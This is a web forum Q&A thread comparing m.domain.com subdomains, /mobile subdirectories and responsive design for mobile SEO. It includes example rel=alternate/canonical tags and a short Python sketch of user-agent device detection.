Mobile SEO best practices: Should my mobile website be located at m.domain.com or domain.com/mobile?
-
I'd like to know if there's any difference between using m.domain.com/pages or domain.com/mobile/pages for a mobile website? Which one is better? Why? Does Google treat the two differently? As you can see, I'm new to this! This is my first time working on a mobile website, so any links/resources would be highly appreciated. Thanks!
-
As Collin already states: this is just part of the long-running discussion about 1) subdirectory, 2) subdomain, or 3) separate domain, so you should weigh that from an SEO perspective. But you should also think about how the desktop version of your website relates to the mobile (and tablet?) version. There are multiple approaches:
- Responsive design (all on the same domain, using the same URLs)
- Separate mobile website and desktop website
- Mobile website on subdomain (m.blaa.com)
- Mobile website on separate domain
In order to help you choose, see below:
Responsive design vs. mobile website
For most websites, responsive design is a good solution. The exception is when the HTML and assets are too heavy for a mobile device to load quickly; in that case I prefer a mobile version of the website on a subdomain.
I believe that is the best solution for high-traffic websites that need to show a large amount of content per page.
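If you do go the separate-URLs route (m.domain.com or domain.com/mobile), Google's guidance for that configuration is to annotate the relationship between the desktop and mobile pages so the two URLs aren't treated as duplicate content. A minimal sketch, using domain.com as a placeholder:

```html
<!-- On the desktop page, e.g. http://domain.com/page -->
<link rel="alternate" media="only screen and (max-width: 640px)"
      href="http://m.domain.com/page">

<!-- On the mobile page, e.g. http://m.domain.com/page -->
<link rel="canonical" href="http://domain.com/page">
```

The rel=alternate tag tells Google where the mobile equivalent lives, and the rel=canonical on the mobile page consolidates link signals back to the desktop URL.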
-
I think it is better to use media queries and JavaScript on the same domain rather than using a subdomain. It makes SEO, site maintenance, content updates, and so on much more efficient.
-
Even with proper rel=canonical tags in place, there's still the issue of having multiple URLs: links and social signals go to two different URLs with the same content rather than to just one.
I'd pick a single URL for all content. Mobile visitors should receive optimized pages via responsive or adaptive design. I do it via user-agent detection, serving optimized versions to desktops, tablets, or phones at the same URL.
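Dynamic serving like this boils down to a user-agent check on the server. The sketch below is only illustrative (the keyword lists are an assumption, not a real detection library), and when you serve different HTML on one URL you should also send a `Vary: User-Agent` header so caches and Googlebot know the response differs by device:

```python
# Minimal sketch of user-agent based device detection for dynamic
# serving (same URL, different HTML). The keyword lists here are an
# illustrative assumption, not an exhaustive detection library.

PHONE_HINTS = ("iphone", "android", "windows phone", "blackberry")
TABLET_HINTS = ("ipad", "tablet", "kindle")

def classify_device(user_agent: str) -> str:
    """Return 'phone', 'tablet', or 'desktop' for a raw User-Agent string."""
    ua = user_agent.lower()
    if any(hint in ua for hint in TABLET_HINTS):
        return "tablet"
    # Note: some Android tablets omit obvious tablet markers; this
    # sketch ignores that edge case and treats them as phones.
    if any(hint in ua for hint in PHONE_HINTS):
        return "phone"
    return "desktop"

def response_headers() -> dict:
    # Tell caches (and Googlebot) that the HTML varies by user agent.
    return {"Vary": "User-Agent", "Content-Type": "text/html"}
```

Your framework would then pick a phone, tablet, or desktop template based on the classification while keeping the URL identical for all visitors.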
-
In short, they each have their own benefits:
- m.domain.com lives in its own world, which makes sweeping changes and the like easier
- domain.com/mobile leverages the existing strength of your domain
If you'd like to read more on it, here's an article that explains it in a little more depth; I won't just restate it all here.
http://plussearchmarketing.com/search/2012/03/mobile-urls-for-seo/